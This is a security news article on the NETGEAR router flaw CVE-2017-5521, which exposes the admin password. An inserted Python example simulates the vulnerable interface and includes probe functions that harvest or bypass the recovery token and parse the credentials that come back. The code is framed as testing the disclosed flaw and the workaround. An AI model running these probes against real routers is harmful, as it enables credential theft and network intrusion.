SecurityWeek

Network Security

Many NETGEAR Routers Leak Admin Passwords

NETGEAR has released firmware updates for many of its routers after an expert discovered that they are affected by serious vulnerabilities that can be exploited to obtain the administrator password for the user interface.

Trustwave researcher Simon Kenin started analyzing NETGEAR routers nearly one year ago, when he was too lazy to get out of bed to perform a cold reboot of his router, and instead attempted to reboot it from its web interface. Since he had forgotten the password, he started looking for ways to remotely hack the device.

The researcher discovered a couple of exploits from 2014 that could be used to obtain a NETGEAR router’s login password via the unauth.cgi and passwordrecovered.cgi script files. Experts had previously demonstrated that a numeric password recovery token provided by unauth.cgi can be used in a request to passwordrecovered.cgi to obtain the device’s username and password in clear text.

passwordrecovered.cgi belongs to the password recovery feature built into NETGEAR routers. Counterintuitively, the leak occurs when that feature is disabled, which is the default setting: in that state, a request to passwordrecovered.cgi carrying the correct recovery token returns the current password in clear text.

Kenin noticed that the old exploits still worked, but he also discovered a new variant of this authentication bypass flaw. He determined that the token is not checked properly on the very first request to passwordrecovered.cgi after a reboot of the device, so an attacker can obtain the password by passing any data to the script, not necessarily a valid token.

The vulnerabilities, tracked as CVE-2017-5521, can be exploited by an attacker with access to the local network or from the Internet if the remote administration feature, which is disabled by default, is enabled on the device.

NETGEAR was informed about the vulnerabilities in April 2016. The vendor released an initial advisory in June, but only workarounds were made available at the time.

The latest version of the advisory shows that NETGEAR has released security updates for 20 affected routers, but there are still a dozen models and firmware versions that remain unpatched. For devices that don’t have a firmware fix available, the manufacturer recommends manually enabling the password recovery feature – the exploits do not work if this feature is enabled – and disabling remote management.
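The two request paths described above, and the workaround of enabling password recovery, are easier to reason about with a small simulation. The following Python is an added example and is not code from the article, from Trustwave or from NETGEAR: a toy router that behaves the way the text describes (unauth.cgi hands out a numeric token, passwordrecovered.cgi returns clear-text credentials when recovery is disabled and the token matches, and the token check is skipped on the first recovery request after a reboot), plus the two probes a tester would run against it. The `id` query parameter, the token appearing in the unauth.cgi page, and the `username=...&password=...` response body are assumptions about the interface rather than the real firmware's format, and all credentials are constructed test values.

```python
"""Simulation of the CVE-2017-5521 behaviour described in the article.

Added example, not code from the article, Trustwave or NETGEAR. The request
parameter (`id`), the token's placement in the unauth.cgi page and the
credential response body are assumptions, not the real firmware's format.
"""
import re
import secrets
from dataclasses import dataclass
from typing import Callable, Optional
from urllib.parse import parse_qs, urlsplit

# A "send" callable takes a path+query string and returns (status, body).
Responder = Callable[[str], tuple[int, str]]


@dataclass
class SimulatedRouter:
    """Constructed stand-in for a vulnerable NETGEAR web UI (not real firmware)."""
    username: str = "admin"
    password: str = "correct-horse"          # constructed test value
    password_recovery_enabled: bool = False  # default setting per the article
    _token: Optional[int] = None
    _first_recovery_request: bool = True     # cleared by the first passwordrecovered.cgi hit

    def reboot(self) -> None:
        self._token = None
        self._first_recovery_request = True

    def handle(self, url: str) -> tuple[int, str]:
        parts = urlsplit(url)
        query = parse_qs(parts.query)
        if parts.path.endswith("/unauth.cgi"):
            if self._token is None:
                self._token = secrets.randbelow(10**9)   # numeric recovery token
            # Assumed page shape: the token is visible as id=<digits> in the 401 page.
            return 401, f'<html>Unauthorized. <a href="unauth.cgi?id={self._token}">login</a></html>'
        if parts.path.endswith("/passwordrecovered.cgi"):
            first = self._first_recovery_request
            self._first_recovery_request = False
            if self.password_recovery_enabled:
                # Workaround state: the page asks the security questions, no credentials.
                return 200, "<html>Answer your security questions to recover the password.</html>"
            supplied = query.get("id", [""])[0]
            token_ok = (supplied.isdigit() and self._token is not None
                        and int(supplied) == self._token)
            # Kenin's variant: on the first request after boot the token is not checked.
            if token_ok or first:
                # Assumed body format for the clear-text credentials.
                return 200, f"username={self.username}&password={self.password}"
            return 401, "invalid token"
        return 404, "not found"


TOKEN_RE = re.compile(r"\bid=(\d+)")


def parse_credentials(body: str) -> Optional[dict]:
    """Return {'username', 'password'} if the body carries clear-text credentials."""
    fields = parse_qs(body)
    if "username" in fields and "password" in fields:
        return {"username": fields["username"][0], "password": fields["password"][0]}
    return None


def probe_token_path(send: Responder) -> Optional[dict]:
    """2014 path: harvest the token from unauth.cgi, replay it to passwordrecovered.cgi."""
    _, body = send("/unauth.cgi")
    match = TOKEN_RE.search(body)
    if match is None:
        return None
    status, body = send(f"/passwordrecovered.cgi?id={match.group(1)}")
    return parse_credentials(body) if status == 200 else None


def probe_unchecked_token_path(send: Responder) -> Optional[dict]:
    """Kenin's variant: a bogus token leaks only on the first recovery request after reboot."""
    status, body = send("/passwordrecovered.cgi?id=0")
    return parse_credentials(body) if status == 200 else None


if __name__ == "__main__":
    router = SimulatedRouter()
    print("token path:", probe_token_path(router.handle))
    router.reboot()
    print("first request after reboot, bogus token:", probe_unchecked_token_path(router.handle))
    print("second request, bogus token:", probe_unchecked_token_path(router.handle))
    hardened = SimulatedRouter(password_recovery_enabled=True)
    print("recovery enabled, token path:", probe_token_path(hardened.handle))
```

Running the module shows the token path leaking on the default configuration, the bogus-token path leaking exactly once after a reboot and then being refused, and both probes returning nothing once password recovery is enabled, which is why the workaround in the advisory is effective on unpatched models.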

Trustwave has identified more than 10,000 vulnerable devices that are remotely accessible. However, considering that NETGEAR is one of the top router manufacturers and has a significant market share, experts believe hundreds of thousands and possibly even more than one million routers could be affected.

“As many people reuse their password, having the admin password of the router gives us an initial foothold on the network. We can see all the devices connected to the network and try to access them with that same admin password,” Kenin said in a blog post. “With malware such as the Mirai botnet being out there, it is also possible that some of the vulnerable routers could be infected and ultimately used as bots as well.”

NETGEAR recently announced the launch of a bug bounty program, with rewards of up to $15,000 per vulnerability. The decision to launch the program came after several researchers complained about how the company handled vulnerability disclosures.

UPDATE. NETGEAR has provided SecurityWeek the following statement:

NETGEAR is aware of the vulnerability (CVE-2017-5521), that has been recently publicized by TrustWave. This is not a new or recent development. We have been working with the security analysts to evaluate the vulnerability. NETGEAR has published a knowledge base article from our support page, which lists the affected routers and the available firmware fix.


Firmware fixes are currently available for the majority of the affected devices. To download the firmware release that fixes the password recovery vulnerability, click the link for the model and visit the firmware release page for further instructions. For devices that are still pending final firmware updates, please follow the advised work around.


Please note that this vulnerability occurs when an attacker can gain access to the internal network or when remote management is enabled on the router. Remote management is turned off by default; although remote management can be turned on through the advanced settings.


NETGEAR does appreciate and value having security concerns brought to our attention. We constantly monitor for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR.


It is NETGEAR’s mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.

Related: Netgear Starts Patching Critical Router Flaw

Related: Serious Flaws Found in Netgear, NUUO Network Video Recorders

Related: Remotely Exploitable 0-Day Impacts NETGEAR WNR2000 Routers

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
